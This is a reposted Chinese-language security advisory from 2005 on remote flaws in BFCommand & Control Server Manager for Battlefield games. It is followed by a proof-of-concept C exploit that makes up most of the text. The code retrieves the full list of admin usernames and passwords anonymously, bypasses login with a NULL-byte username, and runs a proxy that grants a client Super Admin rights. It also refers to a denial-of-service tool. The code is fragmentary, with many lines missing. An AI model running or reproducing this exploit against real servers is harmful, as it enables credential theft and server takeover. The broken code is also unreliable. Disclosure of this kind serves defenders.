BFCommand & Control Server Manager多个远程安全漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2005-08-31
BFCommand & Control Server Manager多个远程安全漏洞 发布日期:2005-08-30

BFCommand & Control Software BFVCC 2.14 _B
BFCommand & Control Software BFVCC 2.0 0_A
BFCommand & Control Software BFCC 1.22 _A
BUGTRAQ  ID: 14690

BFCommand & Control Server Manager是游戏 Battlefield 1942(BFCC)、Battlefield Vietnam(BFVCC)和Battlefield 2(BF2CC)的服务程序管理器。


A] 匿名登录

用户可以连接到服务程序管理器,以“Super Admin”权限完全控制。

B] 通过空用户名绕过登录


    "login" "/x1e"      // command
    "/0"    "/x1e"      // username (NULL byte)
    "none"  "/x1e"      // password
    "none"  "/x1e"      // username
    ""      "/x1e"      // ???
    ""                  // ???
    "/x00/x40/x40/x00"  // command delimiter

C] 客户端获得完全权限


D] 连续连接后服务器拒绝服务


<*来源:Luigi Auriemma (




警 告



by Luigi Auriemma



#ifdef WIN32
    #include "winerr.h"

    #define close   closesocket

    if((attack < 1) || (attack > 4)) {
        fputs("/nError: you must choose a number between the range of available attacks/n/n", stdout);
    if(attack == 4) {
            "Download the tool /"Generic TCP Fake Players DoS/" from here:/n"
            "Launch it with the following arguments/n"
            "  tcpfp -r full 5555/n"
            "substituiting and 5555 with the server and port of the server you/n"
            "want to test./n"
            "/n", stdout);

    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    if(sd < 0) std_err();

    while(scan--) {
        printf("- target   %s : %hu/n",
        inet_ntoa(peer.sin_addr), port);
        len = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
        if(!len) break;
        fputs("  no service available on this port/n", stdout);
        peer.sin_port = htons(++port);
    if(len < 0) std_err();

    if(attack == 1) {
        fputs("- receive server's informations:/n", stdout);
        len = recv_bfcc(sd, buff, BUFFSZ);
        show_bfcc(buff, len);

        fputs("- send anonymous GetUserAccounts commands/n", stdout);
        send_bfcc(sd, "GetUserAccounts", NULL);

            "- receive full list of admin usernames and passwords/n"
            "  Username   Password:/n", stdout);
        len = recv_bfcc(sd, buff, BUFFSZ);
        show_bfcc(buff, len);

    } else if(attack == 2) {
        fputs("- receive server's informations:/n", stdout);
        len = recv_bfcc(sd, buff, BUFFSZ);
        show_bfcc(buff, len);

        fputs("- send login command with NULL nickname/n", stdout);
            "/0",   // BUG exploited here

        fputs("- check for success message:/n", stdout);
        len = recv_bfcc(sd, buff, BUFFSZ);
        show_bfcc(buff, len);

    } else if(attack == 3) {
        proxy(sd, buff, BUFFSZ);


void proxy(int sock, u_char *buff, int size) {
    struct  sockaddr_in peer;
    fd_set  readset;
    int     sdl,
            on = 1,

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(MYPORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("- bind port %hu/n", MYPORT);

    sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sdl < 0) std_err();


    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdl, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(listen(sdl, SOMAXCONN)
      < 0) std_err();

    printf("- launch BFC3 or BFVC3 and sets %s as server and %hu as port/n",
        "", MYPORT);

    sda = accept(sdl, (struct sockaddr *)&peer, &psz);
    if(sda < 0) std_err();

    printf("- connected/n");

    send_bfcc(sda,  // enable everything
        "Action-Warn"                           "/xff" "1" "/xff"
        "Action-Kick"                           "/xff" "1" "/xff"
        "Action-Insta-Kick (No Reason)"         "/xff" "1" "/xff"
        "Action-Ban"                            "/xff" "1" "/xff"
        "Action-Insta-Ban (No Reason)"          "/xff" "1" "/xff"
        "Action-Remove Ban"                     "/xff" "1" "/xff"
        "Action-Clear Banlist"                  "/xff" "1" "/xff"
        "Action-Force to Other Team"            "/xff" "1" "/xff"
        "Action-Kill Player"                    "/xff" "1" "/xff"
        "Action-Send Message to Server"         "/xff" "1" "/xff"
        "Game-Pause"                            "/xff" "1" "/xff"
        "Game-Toggle Auto-Balance"              "/xff" "1" "/xff"
        "Action-Request PB Screenshot"          "/xff" "1" "/xff"
        "BFVC3-Maps Change Maps"                "/xff" "1" "/xff"
        "BFVC3-Maps Change 2 Map NOT in "       "/xff" "1" "/xff"
        "BFVC3-Maps Restart Map"                "/xff" "1" "/xff"
        "BFVC3-Maps Set Next Map"               "/xff" "1" "/xff"
        "BFVC3-Admin Change Server Settings"    "/xff" "1" "/xff"
        "BFVC3-Admin Change FF Settings"        "/xff" "1" "/xff"
        "BFVC3-Admin Change Misc Settings"      "/xff" "1" "/xff"
        "BFVC3-Admin Change Voting Settings"    "/xff" "1" "/xff"
        "USERS-Access User Accounts"            "/xff" "1" "/xff"
        "USERS-Edit User Profiles"              "/xff" "1" "/xff"
        "USERS-Create User"                     "/xff" "1" "/xff"
        "USERS-Edit User"                       "/xff" "1" "/xff"
        "USERS-Delete User"                     "/xff" "1" "/xff"
        "BFVCC-Access Manager Control Panel"    "/xff" "1" "/xff"
        "BFVCC-Access to Auto Admin Settings"   "/xff" "1" "/xff"
        "BFVCC-Load Manager Profiles"           "/xff" "1" "/xff"
        "BFVCC-Save Changes to Profiles"        "/xff" "1" "/xff"
        "BFVCC-Create Manager Profiles"         "/xff" "1" "/xff"
        "BFVCC-Delete Manager Profiles"         "/xff" "1" "/xff"
        "CC-Access the CC Editor"               "/xff" "1" "/xff"
        "CC-Save Changes to CC Profiles"        "/xff" "1" "/xff"
        "CC-Create new CC Profiles"             "/xff" "1" "/xff"
        "CC-Delete CC Profile"                  "/xff" "1" "/xff"
        "CC-Change a Maps CC Profile"           "/xff" "1" "/xff"
        "PB-Edit PB Config Files"               "/xff" "1" "/xff",
        "15567",                                // default server port (useless)
        "admin"                                 "/xff", // username    (useless)
        "Super Admin",                          // profile

    selsock = ((sock > sda) ? sock : sda) + 1;

    for(;;) {
        FD_SET(sock, &readset);
        FD_SET(sda, &readset);
        if(select(selsock, &readset, NULL, NULL, NULL)
          < 0) std_err();

        if(FD_ISSET(sda, &readset)) {
            len = recv_bfcc(sda, buff, size);
            fwrite(buff, len, 1, stdout);

            if(check_drop(buff)) continue;

            len = send(sock, buff, len, 0);
            if(len < 0) std_err();

        if(FD_ISSET(sock, &readset)) {
            len = recv_bfcc(sock, buff, size);
            fwrite(buff, len, 1, stdout);

            if(check_drop(buff)) continue;

            len = send(sda, buff, len, 0);
            if(len < 0) std_err();


int check_drop(u_char *cmd) {
    int     i;
    u_char  *p,
            *drop[] = {

    p = strchr(cmd, DEL);
    if(!p) {
        p = strchr(cmd, END[0]);
        if(!p) return(0);

    for(i = 0; drop[i]; i++) {
        if(!strncmp(cmd, drop[i], p - cmd)) return(1);


void show_bfcc(u_char *buff, int len) {
    u_char  *p,
            *limit = buff + len;

    for(p = buff; p < limit; p = l + 1) {
        for(l = p; *l != DEL; l++) {
            if(!memcmp(l, END, 4)) return;
            if(!memcmp(l, "|;|", 3)) {
                if(*(l - 1) == '/t') *(l - 1) = ' ';
                memcpy(l, "/n  ", 3);
        *l = 0;
        printf("  %s/n", p);

void send_bfcc(int sock, ...) { // final NULL required
    va_list ap;
    int     len;
    u_char  *s;

    va_start(ap, sock);

    s = va_arg(ap, u_char *);
    if(s) {
        for(;;) {
            len = strlen(s);
            if(!len) len++;
            send(sock, s, len, 0);
            s = va_arg(ap, u_char *);
            if(!s) break;
            send(sock, "/x1e", 1, 0);



    send(sock, END, 4, 0);

int recv_bfcc(int sock, u_char *buff, int size) {
    int     len = 0;

        // one command at time, slower but better
    while(len < size) {
        if(recv(sock, buff + len, 1, 0) <= 0) {
            fputs("/nError: connection interrupted/n/n", stdout);
        if(!memcmp(buff + len - 4, END, 4)) break;

    if(len == size) {
        fputs("/nError: command too long/n/n", stdout);


u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("/nError: Unable to resolve hostname (%s)/n", host);
        } else host_ip = *(u_int *)(hp->h_addr);

#ifndef WIN32
    void std_err(void) {


BFCommand & Control Software